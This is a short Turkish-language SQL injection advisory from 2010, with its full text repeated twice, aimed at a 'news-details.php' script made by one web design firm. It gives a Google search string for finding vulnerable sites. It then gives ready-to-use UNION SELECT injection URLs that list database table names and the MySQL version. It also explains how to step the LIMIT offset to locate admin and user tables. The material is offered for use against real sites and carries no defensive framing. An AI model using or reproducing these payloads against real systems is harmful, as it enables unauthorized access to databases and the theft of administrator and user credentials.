selamu aleykum
design direct uk news-details sql injection acigi
yazan ve bulan :gezgin_x
Tarih:21/05/2010
Google Arama: "Designed & Developed by : www.designdirectuk.com"
Sql injection :
http://hedef-site/news-details.php?id=-39%20union%20all%20select%201,table_name,3,4,5,6,7%20from%20information_schema.tables%20limit 15,1
limit sayisini 16,1 17,1 vs vs olarak artirip admin ve user table isimlerini bulmanis lazim her site de admin ve user table isimleri farkli ona gore
information_schema.tables sadece mysql version 5 kullanilir version 4 table isimlerini kendiniz tahmin etmek zorundasiniz
http://hedef-site/news-details.php?id=-39%20union%20all%20select%201,version(),3,4,5,6,7 <<boyle mysql versionunu bulabilirsiniz Bilmyeneler icin >>
kolay gelsin
design direct uk news-details sql injection acigi
yazan ve bulan :gezgin_x
Tarih:21/05/2010
Google Arama: "Designed & Developed by : www.designdirectuk.com"
Sql injection :
http://hedef-site/news-details.php?id=-39%20union%20all%20select%201,table_name,3,4,5,6,7%20from%20information_schema.tables%20limit 15,1
limit sayisini 16,1 17,1 vs vs olarak artirip admin ve user table isimlerini bulmanis lazim her site de admin ve user table isimleri farkli ona gore
information_schema.tables sadece mysql version 5 kullanilir version 4 table isimlerini kendiniz tahmin etmek zorundasiniz
http://hedef-site/news-details.php?id=-39%20union%20all%20select%201,version(),3,4,5,6,7 <<boyle mysql versionunu bulabilirsiniz Bilmyeneler icin >>
kolay gelsin
